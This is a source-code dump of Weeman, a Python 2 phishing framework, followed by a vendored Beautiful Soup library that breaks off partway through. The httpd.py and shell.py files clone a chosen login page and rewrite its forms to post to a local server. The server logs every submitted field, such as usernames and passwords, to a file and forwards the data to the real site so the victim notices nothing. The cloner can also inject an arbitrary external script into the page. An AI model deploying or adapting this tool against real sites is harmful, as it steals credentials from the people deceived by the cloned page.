 9 | Adrien Kuhn () - for adding Fedora instructions #3.
10 | lisogallo - 'external_js' option for including external scripts
11 | 
12 | 


--------------------------------------------------------------------------------
/weeman/core/__init__.py:
--------------------------------------------------------------------------------
1 | #
2 | # __init__.py - just pass
3 | #
4 | 
5 | pass
6 | 


--------------------------------------------------------------------------------
/weeman/core/complete.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # complete.py - auto complete with readline
 3 | #
 4 | # Credit to (http://stackoverflow.com/a/187660)
 5 | #
 6 | # This file if part of weeman project
 7 | #
 8 | # See 'LICENSE' file for copying
 9 | #
10 | 
11 | import readline
12 | 
13 | array = ["set", "show",
14 |          "help", "port",
15 |          "url", "action_url",
16 |          "user_agent", "html_file",
17 |          "external_js", "clear",
18 |          "quit",
19 |          "run", "banner"]
20 | 
21 | class auto(object):
22 | 
23 |     def __init__(self, options):
24 |         self.options = sorted(options)
25 | 
26 |     def complete(self, text, state):
27 |         if state == 0:
28 |             if text:
29 |                 self.matches = [s for s in self.options
30 |                                     if s and s.startswith(text)]
31 |             else:
32 |                 self.matches = self.options[:]
33 |         try:
34 |             return self.matches[state]
35 |         except IndexError:
36 |             return None
37 | 
38 | def complete(array):
39 |     completer = auto(array)
40 |     readline.set_completer(completer.complete)
41 |     readline.parse_and_bind('tab:complete')
42 | 


--------------------------------------------------------------------------------
/weeman/core/config.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # config.py - config variables
 3 | #
 4 | # This file if part of weeman project
 5 | #
 6 | # See 'LICENSE' file for copying
 7 | #
 8 | 
 9 | 
10 | import os
11 | import sys
12 | 
13 | __author__ = "Hypsurus <hypsurus@mail.ru>"
14 | __version__ = "1.7.1"
15 | __codename__ = "end"
16 | 
17 | say = "There are plenty of fish in the sea"
18 | 
19 | def history_getkey(key):
20 |     try:
21 |         history = open("history.log", "r").readlines()
22 |     except Exception as e:
23 |         return 0
24 |     if history == None:
25 |         return 0
26 |     for line in history:
27 |         if line.startswith("\n") or line.startswith("#"):
28 |             pass
29 |         (skey,value) = line.split(" = ")
30 |         if skey == key:
31 |             return str(value[:-1])
32 |     return 0
33 | 
34 | url = history_getkey("url") or None
35 | port = int(history_getkey("port")) or int(8080)
36 | action_url = history_getkey("action_url") or None
37 | user_agent = history_getkey("user_agent") or "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
38 | html_file = None
39 | external_js = history_getkey("external_js") or None
40 | quiet_mode = False
41 | 


--------------------------------------------------------------------------------
/weeman/core/httpd.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # httpd.py - the main httpd server
  3 | #
  4 | # This file if part of weeman project
  5 | #
  6 | # See 'LICENSE' file for copying
  7 | #
  8 | 
  9 | import SimpleHTTPServer
 10 | import SocketServer
 11 | import urllib2
 12 | import cgi
 13 | import os
 14 | import time
 15 | from socket import error as socerr
 16 | from core.config import __version__
 17 | from core.config import __codename__
 18 | from core.misc import printt
 19 | from lib.bs4 import BeautifulSoup as bs
 20 | 
 21 | class handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
 22 |     ## Set server version
 23 |     server_version = "Weeman %s (%s)" %(__version__, __codename__)
 24 |     """
 25 |         Log message handler for simple HTTP server.
 26 |     """
 27 |     def do_POST(self):
 28 |         post_request = []
 29 |         printt(3, "%s - sent POST request." %self.address_string())
 30 |         form = cgi.FieldStorage(self.rfile,
 31 |         headers=self.headers,
 32 |         environ={'REQUEST_METHOD':'POST',
 33 |                  'CONTENT_TYPE':self.headers['Content-Type'],})
 34 |         try:
 35 |             
 36 |             from core.shell import url
 37 |             
 38 |             logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a")
 39 |             logger.write("\n## %s - Data for %s\n\n" %(time.strftime("%H:%M:%S - %d/%m/%y"), url))
 40 |             
 41 |             for tag in form.list:
 42 |                 tmp = str(tag).split("(")[1]
 43 |                 key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split()
 44 |                 post_request.append("%s %s" %(key,value))
 45 |                 printt(2, "%s => %s" %(key,value))
 46 |                 logger.write("%s => %s\n" %(key,value))
 47 |             logger.close()
 48 |             
 49 |             from core.shell import action_url
 50 |             
 51 |             create_post(url,action_url, post_request)
 52 |             SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
 53 |         
 54 |         except socerr as e:
 55 |             printt(3, "%s igonring ..." %str(e))
 56 |         except Exception as e:
 57 |             printt(3, "%s igonring ..." %str(e))
 58 | 
 59 |     def log_message(self, format, *args):
 60 |         
 61 |         arg = format%args
 62 |         if arg.split()[1] == "/":
 63 |             printt(3, "%s - sent GET request without parameters." %self.address_string())
 64 |         else:
 65 |             if arg.split()[1].startswith("/") and "&" in arg.split()[1]:
 66 |                 printt(3, "%s - sent GET request with parameters." %self.address_string())
 67 |                 printt(2, "%s" %arg.split()[1])
 68 | 
 69 | class weeman(object):
 70 |     """
 71 |         weeman Object 
 72 |     """
 73 |     def __init__(self, url,port):
 74 |         
 75 |         from core.shell import url
 76 |         from core.shell import port
 77 |         
 78 |         self.port = port
 79 |         self.httpd = None
 80 |         self.url = url
 81 |         self.form_url = None;
 82 | 
 83 |     def request(self,url):
 84 |         """
 85 |             Send request to the http server.
 86 |         """
 87 | 
 88 |         from core.shell import user_agent
 89 |         
 90 |         opener = urllib2.build_opener()
 91 |         opener.addheaders = [('User-Agent', user_agent),
 92 |                 ("Accept", "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"),
 93 |                 #("Accept-Language","en-US,en;q=0.9,en;q=0.8"),
 94 |                 #("Accept-Encoding", "gzip;q=0,deflate,sdch"),
 95 |                 #("Accept-Charset", "ISO-8859-2,utf-8;q=0.7,*;q=0.7"),
 96 |                 ("Keep-Alive", "115"),
 97 |                 ("Connection", "keep-alive"),
 98 |                 ("DNT", "1")]
 99 |         return opener.open(self.url).read()
100 | 
101 |     def clone(self):
102 | 
103 |         from core.shell import html_file
104 |         from core.shell import external_js
105 | 
106 |         if not html_file:
107 |             printt(3, "Trying to get %s  ..." %self.url)
108 |             printt(3, "Downloading webpage ...")
109 |             data = self.request(self.url)
110 |         else:
111 |             printt(3, "Loading \'%s\' ..." %html_file)
112 |             data = open(html_file, "r").read()
113 | 
114 |         data = bs(data, "html.parser")
115 |         printt(3, "Modifying the HTML file ...")
116 | 
117 |         for tag in data.find_all("form"):
118 |             tag['method'] = "post"
119 |             tag['action'] = "redirect.html"
120 | 
121 |         # Replace path with full path with the URL
122 |         for tag in data.find_all("a"):
123 |             pass
124 | 
125 |         # Insert external script
126 |         script = data.new_tag('script', src=external_js)
127 |         data.html.head.insert(len(data.html.head), script)
128 |         
129 |         with open("index.html", "w") as index:
130 |             index.write(data.prettify().encode('utf-8'))
131 |             index.close()
132 | 
133 |     def serve(self):
134 |         
135 |         print("\033[01;35m[i] Starting Weeman %s server on http://localhost:%d\033[00m" %(__version__, self.port))
136 |         self.httpd = SocketServer.TCPServer(("", self.port),handler)
137 |         self.httpd.serve_forever()
138 | 
139 |     def cleanup(self):
140 |         
141 |         if os.path.exists("index.html"):
142 |             printt(3, "\n[i] Running cleanup ...")
143 |             os.remove("index.html")
144 |         if os.path.exists("redirect.html"):
145 |             os.remove("redirect.html")
146 | 
147 | def create_post(url,action_url, post_request):
148 |     """
149 |         Create the page that will reidrect to the orignal page.
150 |     """
151 |     
152 |     printt(3, "Creating redirect.html ...")
153 |     
154 |     with open("redirect.html","w") as r:
155 |         r.write("<body><form id=\"firefox\" action=\"%s\" method=\"post\" >\n" %action_url)
156 |         for post in post_request:
157 |             key,value = post.split()
158 |             r.write("<input name=\"%s\" value=\"%s\" type=\"hidden\" >\n" %(key,value))
159 |         r.write("<input name=\"login\" type=\"hidden\">")
160 |         r.write("<script type=\"text/javascript\">document.forms[\"firefox\"].submit();</script>")
161 |     r.close()
162 | 


--------------------------------------------------------------------------------
/weeman/core/logo.txt:
--------------------------------------------------------------------------------
1 | ____________________GottModusTermux____________________
2 |     ___       ___       ___       ___       ___       ___   
3 |    /\__\     /\  \     /\  \     /\__\     /\  \     /\__\  
4 |   /:/\__\   /::\  \   /::\  \   /::L_L_   /::\  \   /:| _|_ 
5 |  /:/:/\__\ /::\:\__\ /::\:\__\ /:/L:\__\ /::\:\__\ /::|/\__\
6 |  \::/:/  / \:\:\/  / \:\:\/  / \/_/:/  / \/\::/  / \/|::/  /
7 |   \::/  /   \:\/  /   \:\/  /    /:/  /    /:/  /    |:/  / 
8 |    \/__/     \/__/     \/__/     \/__/     \/__/     \/__/  
9 | 


--------------------------------------------------------------------------------
/weeman/core/misc.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # misc.py - usefull functions
 3 | #
 4 | # This file if part of weeman project
 5 | #
 6 | # See 'LICENSE' file for copying
 7 | #
 8 | 
 9 | 
10 | import sys
11 | import time
12 | 
13 | # help options
14 | help_options = {"url" : "The URL of the webpage, with https:// or http://.",
15 |                 "action_url" : "The form action URL of the webpage.",
16 |                 "port" : "The port weeman will listen",
17 |                 "user_agent" : "Weeman User-Agent string.",
18 |                 "html_file" : "allows you to load html file instead of URL.",
19 |                 "external_js" : "allows you to include an external script to be loaded.",
20 |                 "set" : "Set value for option, set <option> <value>.",
21 |                 "run" : "Run the server, alias = \'r\'.",
22 |                 "clear" : "clear the screen.",
23 |                 "help" : "We all know (:",
24 |                 "quit" : "quit, alias = \'q\'."}
25 | 
26 | 
27 | def printt(s, msg):
28 |     
29 |     if s == 1:
30 |         print("\033[01;31mError: %s\033[00m")
31 |         sys.exit(1)
32 |     elif s == 2:
33 |         print("[%s]\033[01;32m %s\033[00m" %(time.strftime("%H:%M:%S"),msg))
34 |     elif s == 3:
35 |         print("\033[01;37m[%s] %s\033[00m" %(time.strftime("%H:%M:%S"),msg))
36 |     else:
37 |         print("\033[01;37m[%s] %s\033[00m" %(time.strftime("%H:%M:%S"),msg))
38 | 
39 | def print_help():
40 | 
41 |     print("\t\033[01;32m")
42 |     print("\tshow        : show default settings.")
43 |     print("\tset         : set value for option (set <option> <value>).")
44 |     print("\trun         : start the server.")
45 |     print("\tclear       : clear screen.")
46 |     print("\thelp        : show help or (help <option>.)")
47 |     print("\tframework   : load the modules framework.")
48 |     print("\tquit        : quit.\033[00m")
49 | 
50 | def print_help_option(option):
51 | 
52 |     found = 0
53 |     for opt in help_options.items():
54 |         if opt[0] == option:
55 |             found = 1
56 |             printt(32, "%s - %s" %(option, opt[1]))
57 |     if not found:
58 |         printt(3, "Error: option \'%s\' not found." %option)
59 | 
60 | def isroot():
61 | 
62 |     if os.getuid() !=0:
63 |         printt(1,"Please run weeman as root.")
64 | 


--------------------------------------------------------------------------------
/weeman/core/shell.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # shell.py - the weeman main shell
  3 | #
  4 | # This file if part of weeman project
  5 | #
  6 | # See 'LICENSE' file for copying
  7 | #
  8 | 
  9 | import sys
 10 | import os
 11 | from core.complete import complete
 12 | from core.complete import array
 13 | from core.config import __version__
 14 | from core.config import __codename__
 15 | from core.misc import printt
 16 | from core.misc import print_help
 17 | from core.misc import print_help_option
 18 | from core.config import url
 19 | from core.config import action_url
 20 | from core.config import port
 21 | from core.config import user_agent
 22 | from core.config import html_file
 23 | from core.config import external_js
 24 | from core.config import quiet_mode
 25 | from core.config import say
 26 | from core.httpd import weeman
 27 | 
 28 | def print_startup():
 29 |     """
 30 |         Print the startup banner
 31 |     """
 32 |     print("\033[H\033[J") # Clear the screen
 33 |     print("\033[01;31m")
 34 |     sys.stdout.write(open("core/logo.txt", "r").read()[:-1])
 35 |     print("\033[00m")
 36 |     sys.stdout.write("\t  .:[ Weeman last version (%s-%s) ]:.\n\033[00m" %(__version__,  __codename__,))
 37 | 
 38 | def profile_getkey(profile_file, key):
 39 |     try:
 40 |         profile = open(profile_file, "r").readlines()
 41 |     except Exception as e:
 42 |         return 0
 43 |     if profile == None:
 44 |         return 0
 45 |     for line in profile:
 46 |         if line.startswith("\n") or line.startswith("#"):
 47 |             pass
 48 | 
 49 |         else:
 50 |             (skey,value) = line.split(" = ")
 51 |             if skey == key:
 52 |                 return str(value[:-1])
 53 | 
 54 |     return 0
 55 | 
 56 | def shell_noint(profile_file):
 57 |     global url
 58 |     global port
 59 |     global action_url
 60 |     global user_agent
 61 |     global html_file
 62 |     global external_js
 63 | 
 64 |     try:
 65 |         url = profile_getkey(profile_file, "url")
 66 |         action_url = profile_getkey(profile_file, "action_url")
 67 |         port = int(profile_getkey(profile_file, "port"))
 68 |         user_agent = profile_getkey(profile_file, "user_agent")
 69 |         html_file = profile_getkey(profile_file, "html_file")
 70 |         external_js = profile_getkey(profile_file, "external_js")
 71 | 
 72 |         print_startup()
 73 |         s = weeman(url,port)
 74 |         s.clone()
 75 |         s.serve()
 76 | 
 77 |     except ValueError:
 78 |         printt(3, "Error: your profile file looks bad.")
 79 |     except KeyboardInterrupt:
 80 |         s = weeman(url,port)
 81 |         s.cleanup()
 82 |         print("\nInterrupt ...")
 83 |     except IndexError:
 84 |         if prompt[0] == "help" or prompt[0] == "?":
 85 |             print_help()
 86 |         else:
 87 |             printt(3, "Error: please provide option for \'%s\'." %prompt[0])
 88 |     except Exception as e:
 89 |         printt(3, "Error: (%s)" %(str(e)))
 90 | 
 91 | def shell():
 92 |     """
 93 |         The shell, parse command line args,
 94 |         and set variables.
 95 |     """
 96 |     global url
 97 |     global port
 98 |     global action_url
 99 |     global user_agent
100 |     global html_file
101 |     global external_js
102 | 
103 |     print_startup()
104 | 
105 |     if os.path.exists("history.log"):
106 |         if  os.stat("history.log").st_size == 0:
107 |             history = open("history.log", "w")
108 |         else:
109 |             history = open("history.log", "a")
110 |     else:
111 |         history = open("history.log", "w")
112 | 
113 |     while True:
114 |         try:
115 |             # for Re-complete
116 |             complete(array)
117 |             an = raw_input("weeman > ") or "help"
118 |             prompt = an.split()
119 |             if not prompt:
120 |               continue
121 |             elif prompt[0] == ";" or prompt[0] == "clear":
122 |                 print("\033[H\033[J")
123 |             elif prompt[0] == "q" or prompt[0] == "quit":
124 |                 printt(2,"bye bye!")
125 |                 break;
126 |             elif prompt[0] == "help" or prompt[0] == "?":
127 |                 if prompt[1]:
128 |                     print_help_option(str(prompt[1]))
129 |                 else:
130 |                     print_help()
131 |             elif prompt[0] == "show":
132 |                 sys.stdout.write("\033[01;37m\t")
133 |                 print("-" * 20)
134 |                 print("\turl          : %s " %url)
135 |                 print("\tport         : %d " %(port))
136 |                 print("\taction_url   : %s " %(action_url))
137 |                 print("\tuser_agent   : %s " %(user_agent))
138 |                 print("\thtml_file    : %s " %(html_file))
139 |                 print("\texternal_js  : %s " %(external_js))
140 |                 sys.stdout.write("\t")
141 |                 print("-" * 20)
142 |                 sys.stdout.write("\033[01;00m")
143 |             elif prompt[0] == "set":
144 |                 if prompt[1] == "port":
145 |                     port = int(prompt[2])
146 |                     ## Check if port == 80 and not running as root
147 |                     if port == 80 and os.getuid() != 0:
148 |                         printt(2, "Permission denied, to bind port 80, you need to run weeman as root.");
149 |                     history.write("port = %s\n" %port)
150 |                 if prompt[1] == "url":
151 |                     url = str(prompt[2])
152 |                     history.write("url = %s\n" %url)
153 |                 if prompt[1] == "action_url":
154 |                     action_url = str(prompt[2])
155 |                     history.write("action_url = %s\n" %action_url)
156 |                 if prompt[1] == "user_agent":
157 |                     prompt.pop(0)
158 |                     u = str()
159 |                     for x in prompt:
160 |                         u+=" "+x
161 |                     user_agent = str(u.replace("user_agent", ""))
162 |                     history.write("user_agent = %s\n" %user_agent)
163 |                 if prompt[1] == "html_file":
164 |                     html_file = str(prompt[2])
165 |                 if prompt[1] == "external_js":
166 |                     external_js = str(prompt[2])
167 |                     history.write("external_js = %s\n" %external_js)
168 |             elif prompt[0] == "run" or prompt[0] == "r":
169 |                 if not url:
170 |                     printt(3, "Error: please set \"url\".")
171 |                 elif not action_url:
172 |                     printt(3, "Error: please set \"action_url\".")
173 |                 else:
174 |                     # Here we start the server (:
175 |                     s = weeman(url,port)
176 |                     s.clone()
177 |                     s.serve()
178 |             elif prompt[0] == "banner" or prompt[0] == "b":
179 |                 print_startup()
180 |             else:
181 |                 print("Error: No such command \'%s\'." %prompt[0])
182 | 
183 |         except KeyboardInterrupt:
184 |             s = weeman(url,port)
185 |             s.cleanup()
186 |             print("\n%s" %say)
187 |         except IndexError:
188 |             if prompt[0] == "help" or prompt[0] == "?":
189 |                 print_help()
190 |             else:
191 |                 printt(3, "Error: please provide option for \'%s\'." %prompt[0])
192 |         except Exception as e:
193 |             printt(3, "Error: (%s)" %(str(e)))
194 | 


--------------------------------------------------------------------------------
/weeman/core/weeman_curr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/weeman/core/weeman_curr.png


--------------------------------------------------------------------------------
/weeman/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #
2 | # Copyright (c) 2015-2016 by Hypsurus <hypsurus@mail.ru>
3 | #
4 | # See 'LICENSE' for copying
5 | #
6 | 
7 | 
8 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/COPYING.txt:
--------------------------------------------------------------------------------
 1 | Beautiful Soup is made available under the MIT license:
 2 | 
 3 |  Copyright (c) 2004-2016 Leonard Richardson
 4 | 
 5 |  Permission is hereby granted, free of charge, to any person obtaining
 6 |  a copy of this software and associated documentation files (the
 7 |  "Software"), to deal in the Software without restriction, including
 8 |  without limitation the rights to use, copy, modify, merge, publish,
 9 |  distribute, sublicense, and/or sell copies of the Software, and to
10 |  permit persons to whom the Software is furnished to do so, subject to
11 |  the following conditions:
12 | 
13 |  The above copyright notice and this permission notice shall be
14 |  included in all copies or substantial portions of the Software.
15 | 
16 |  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 |  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 |  MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
19 |  NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
20 |  BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
21 |  ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
22 |  CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 |  SOFTWARE.
24 | 
25 | Beautiful Soup incorporates code from the html5lib library, which is
26 | also made available under the MIT license. Copyright (c) 2006-2013
27 | James Graham and other contributors
28 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/__init__.py:
--------------------------------------------------------------------------------
  1 | """Beautiful Soup
  2 | Elixir and Tonic
  3 | "The Screen-Scraper's Friend"
  4 | http://www.crummy.com/software/BeautifulSoup/
  5 | 
  6 | Beautiful Soup uses a pluggable XML or HTML parser to parse a
  7 | (possibly invalid) document into a tree representation. Beautiful Soup
  8 | provides methods and Pythonic idioms that make it easy to navigate,
  9 | search, and modify the parse tree.
 10 | 
 11 | Beautiful Soup works with Python 2.7 and up. It works better if lxml
 12 | and/or html5lib is installed.
 13 | 
 14 | For more than you ever wanted to know about Beautiful Soup, see the
 15 | documentation:
 16 | http://www.crummy.com/software/BeautifulSoup/bs4/doc/
 17 | 
 18 | """
 19 | 
 20 | # Use of this source code is governed by a BSD-style license that can be
 21 | # found in the LICENSE file.
 22 | 
 23 | __author__ = "Leonard Richardson (leonardr@segfault.org)"
 24 | __version__ = "4.5.1"
 25 | __copyright__ = "Copyright (c) 2004-2016 Leonard Richardson"
 26 | __license__ = "MIT"
 27 | 
 28 | __all__ = ['BeautifulSoup']
 29 | 
 30 | import os
 31 | import re
 32 | import traceback
 33 | import warnings
 34 | 
 35 | from .builder import builder_registry, ParserRejectedMarkup
 36 | from .dammit import UnicodeDammit
 37 | from .element import (
 38 |     CData,
 39 |     Comment,
 40 |     DEFAULT_OUTPUT_ENCODING,
 41 |     Declaration,
 42 |     Doctype,
 43 |     NavigableString,
 44 |     PageElement,
 45 |     ProcessingInstruction,
 46 |     ResultSet,
 47 |     SoupStrainer,
 48 |     Tag,
 49 |     )
 50 | 
 51 | # The very first thing we do is give a useful error if someone is
 52 | # running this code under Python 3 without converting it.
 53 | 'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
 54 | 
 55 | class BeautifulSoup(Tag):
 56 |     """
 57 |     This class defines the basic interface called by the tree builders.
 58 | 
 59 |     These methods will be called by the parser:
 60 |       reset()
 61 |       feed(markup)
 62 | 
 63 |     The tree builder may call these methods from its feed() implementation:
 64 |       handle_starttag(name, attrs) # See note about return value
 65 |       handle_endtag(name)
 66 |       handle_data(data) # Appends to the current data node
 67 |       endData(containerClass=NavigableString) # Ends the current data node
 68 | 
 69 |     No matter how complicated the underlying parser is, you should be
 70 |     able to build a tree using 'start tag' events, 'end tag' events,
 71 |     'data' events, and "done with data" events.
 72 | 
 73 |     If you encounter an empty-element tag (aka a self-closing tag,
 74 |     like HTML's <br> tag), call handle_starttag and then
 75 |     handle_endtag.
 76 |     """
 77 |     ROOT_TAG_NAME = u'[document]'
 78 | 
 79 |     # If the end-user gives no indication which tree builder they
 80 |     # want, look for one with these features.
 81 |     DEFAULT_BUILDER_FEATURES = ['html', 'fast']
 82 | 
 83 |     ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
 84 | 
 85 |     NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nThe code that caused this warning is on line %(line_number)s of the file %(filename)s. To get rid of this warning, change code that looks like this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"
 86 | 
 87 |     def __init__(self, markup="", features=None, builder=None,
 88 |                  parse_only=None, from_encoding=None, exclude_encodings=None,
 89 |                  **kwargs):
 90 |         """The Soup object is initialized as the 'root tag', and the
 91 |         provided markup (which can be a string or a file-like object)
 92 |         is fed into the underlying parser."""
 93 | 
 94 |         if 'convertEntities' in kwargs:
 95 |             warnings.warn(
 96 |                 "BS4 does not respect the convertEntities argument to the "
 97 |                 "BeautifulSoup constructor. Entities are always converted "
 98 |                 "to Unicode characters.")
 99 | 
100 |         if 'markupMassage' in kwargs:
101 |             del kwargs['markupMassage']
102 |             warnings.warn(
103 |                 "BS4 does not respect the markupMassage argument to the "
104 |                 "BeautifulSoup constructor. The tree builder is responsible "
105 |                 "for any necessary markup massage.")
106 | 
107 |         if 'smartQuotesTo' in kwargs:
108 |             del kwargs['smartQuotesTo']
109 |             warnings.warn(
110 |                 "BS4 does not respect the smartQuotesTo argument to the "
111 |                 "BeautifulSoup constructor. Smart quotes are always converted "
112 |                 "to Unicode characters.")
113 | 
114 |         if 'selfClosingTags' in kwargs:
115 |             del kwargs['selfClosingTags']
116 |             warnings.warn(
117 |                 "BS4 does not respect the selfClosingTags argument to the "
118 |                 "BeautifulSoup constructor. The tree builder is responsible "
119 |                 "for understanding self-closing tags.")
120 | 
121 |         if 'isHTML' in kwargs:
122 |             del kwargs['isHTML']
123 |             warnings.warn(
124 |                 "BS4 does not respect the isHTML argument to the "
125 |                 "BeautifulSoup constructor. Suggest you use "
126 |                 "features='lxml' for HTML and features='lxml-xml' for "
127 |                 "XML.")
128 | 
129 |         def deprecated_argument(old_name, new_name):
130 |             if old_name in kwargs:
131 |                 warnings.warn(
132 |                     'The "%s" argument to the BeautifulSoup constructor '
133 |                     'has been renamed to "%s."' % (old_name, new_name))
134 |                 value = kwargs[old_name]
135 |                 del kwargs[old_name]
136 |                 return value
137 |             return None
138 | 
139 |         parse_only = parse_only or deprecated_argument(
140 |             "parseOnlyThese", "parse_only")
141 | 
142 |         from_encoding = from_encoding or deprecated_argument(
143 |             "fromEncoding", "from_encoding")
144 | 
145 |         if from_encoding and isinstance(markup, unicode):
146 |             warnings.warn("You provided Unicode markup but also provided a value for from_encoding. Your from_encoding will be ignored.")
147 |             from_encoding = None
148 | 
149 |         if len(kwargs) > 0:
150 |             arg = kwargs.keys().pop()
151 |             raise TypeError(
152 |                 "__init__() got an unexpected keyword argument '%s'" % arg)
153 | 
154 |         if builder is None:
155 |             original_features = features
156 |             if isinstance(features, basestring):
157 |                 features = [features]
158 |             if features is None or len(features) == 0:
159 |                 features = self.DEFAULT_BUILDER_FEATURES
160 |             builder_class = builder_registry.lookup(*features)
161 |             if builder_class is None:
162 |                 raise FeatureNotFound(
163 |                     "Couldn't find a tree builder with the features you "
164 |                     "requested: %s. Do you need to install a parser library?"
165 |                     % ",".join(features))
166 |             builder = builder_class()
167 |             if not (original_features == builder.NAME or
168 |                     original_features in builder.ALTERNATE_NAMES):
169 |                 if builder.is_xml:
170 |                     markup_type = "XML"
171 |                 else:
172 |                     markup_type = "HTML"
173 | 
174 |                 caller = traceback.extract_stack()[0]
175 |                 filename = caller[0]
176 |                 line_number = caller[1]
177 |                 warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
178 |                     filename=filename,
179 |                     line_number=line_number,
180 |                     parser=builder.NAME,
181 |                     markup_type=markup_type))
182 | 
183 |         self.builder = builder
184 |         self.is_xml = builder.is_xml
185 |         self.known_xml = self.is_xml
186 |         self.builder.soup = self
187 | 
188 |         self.parse_only = parse_only
189 | 
190 |         if hasattr(markup, 'read'):        # It's a file-type object.
191 |             markup = markup.read()
192 |         elif len(markup) <= 256 and (
193 |                 (isinstance(markup, bytes) and not b'<' in markup)
194 |                 or (isinstance(markup, unicode) and not u'<' in markup)
195 |         ):
196 |             # Print out warnings for a couple beginner problems
197 |             # involving passing non-markup to Beautiful Soup.
198 |             # Beautiful Soup will still parse the input as markup,
199 |             # just in case that's what the user really wants.
200 |             if (isinstance(markup, unicode)
201 |                 and not os.path.supports_unicode_filenames):
202 |                 possible_filename = markup.encode("utf8")
203 |             else:
204 |                 possible_filename = markup
205 |             is_file = False
206 |             try:
207 |                 is_file = os.path.exists(possible_filename)
208 |             except Exception, e:
209 |                 # This is almost certainly a problem involving
210 |                 # characters not valid in filenames on this
211 |                 # system. Just let it go.
212 |                 pass
213 |             if is_file:
214 |                 if isinstance(markup, unicode):
215 |                     markup = markup.encode("utf8")
216 |                 warnings.warn(
217 |                     '"%s" looks like a filename, not markup. You should'
218 |                     'probably open this file and pass the filehandle into'
219 |                     'Beautiful Soup.' % markup)
220 |             self._check_markup_is_url(markup)
221 | 
222 |         for (self.markup, self.original_encoding, self.declared_html_encoding,
223 |          self.contains_replacement_characters) in (
224 |              self.builder.prepare_markup(
225 |                  markup, from_encoding, exclude_encodings=exclude_encodings)):
226 |             self.reset()
227 |             try:
228 |                 self._feed()
229 |                 break
230 |             except ParserRejectedMarkup:
231 |                 pass
232 | 
233 |         # Clear out the markup and remove the builder's circular
234 |         # reference to this object.
235 |         self.markup = None
236 |         self.builder.soup = None
237 | 
238 |     def __copy__(self):
239 |         copy = type(self)(
240 |             self.encode('utf-8'), builder=self.builder, from_encoding='utf-8'
241 |         )
242 | 
243 |         # Although we encoded the tree to UTF-8, that may not have
244 |         # been the encoding of the original markup. Set the copy's
245 |         # .original_encoding to reflect the original object's
246 |         # .original_encoding.
247 |         copy.original_encoding = self.original_encoding
248 |         return copy
249 | 
250 |     def __getstate__(self):
251 |         # Frequently a tree builder can't be pickled.
252 |         d = dict(self.__dict__)
253 |         if 'builder' in d and not self.builder.picklable:
254 |             d['builder'] = None
255 |         return d
256 | 
257 |     @staticmethod
258 |     def _check_markup_is_url(markup):
259 |         """ 
260 |         Check if markup looks like it's actually a url and raise a warning 
261 |         if so. Markup can be unicode or str (py2) / bytes (py3).
262 |         """
263 |         if isinstance(markup, bytes):
264 |             space = b' '
265 |             cant_start_with = (b"http:", b"https:")
266 |         elif isinstance(markup, unicode):
267 |             space = u' '
268 |             cant_start_with = (u"http:", u"https:")
269 |         else:
270 |             return
271 | 
272 |         if any(markup.startswith(prefix) for prefix in cant_start_with):
273 |             if not space in markup:
274 |                 if isinstance(markup, bytes):
275 |                     decoded_markup = markup.decode('utf-8', 'replace')
276 |                 else:
277 |                     decoded_markup = markup
278 |                 warnings.warn(
279 |                     '"%s" looks like a URL. Beautiful Soup is not an'
280 |                     ' HTTP client. You should probably use an HTTP client like'
281 |                     ' requests to get the document behind the URL, and feed'
282 |                     ' that document to Beautiful Soup.' % decoded_markup
283 |                 )
284 | 
285 |     def _feed(self):
286 |         # Convert the document to Unicode.
287 |         self.builder.reset()
288 | 
289 |         self.builder.feed(self.markup)
290 |         # Close out any unfinished strings and close all the open tags.
291 |         self.endData()
292 |         while self.currentTag.name != self.ROOT_TAG_NAME:
293 |             self.popTag()
294 | 
295 |     def reset(self):
296 |         Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
297 |         self.hidden = 1
298 |         self.builder.reset()
299 |         self.current_data = []
300 |         self.currentTag = None
301 |         self.tagStack = []
302 |         self.preserve_whitespace_tag_stack = []
303 |         self.pushTag(self)
304 | 
305 |     def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
306 |         """Create a new tag associated with this soup."""
307 |         return Tag(None, self.builder, name, namespace, nsprefix, attrs)
308 | 
309 |     def new_string(self, s, subclass=NavigableString):
310 |         """Create a new NavigableString associated with this soup."""
311 |         return subclass(s)
312 | 
313 |     def insert_before(self, successor):
314 |         raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
315 | 
316 |     def insert_after(self, successor):
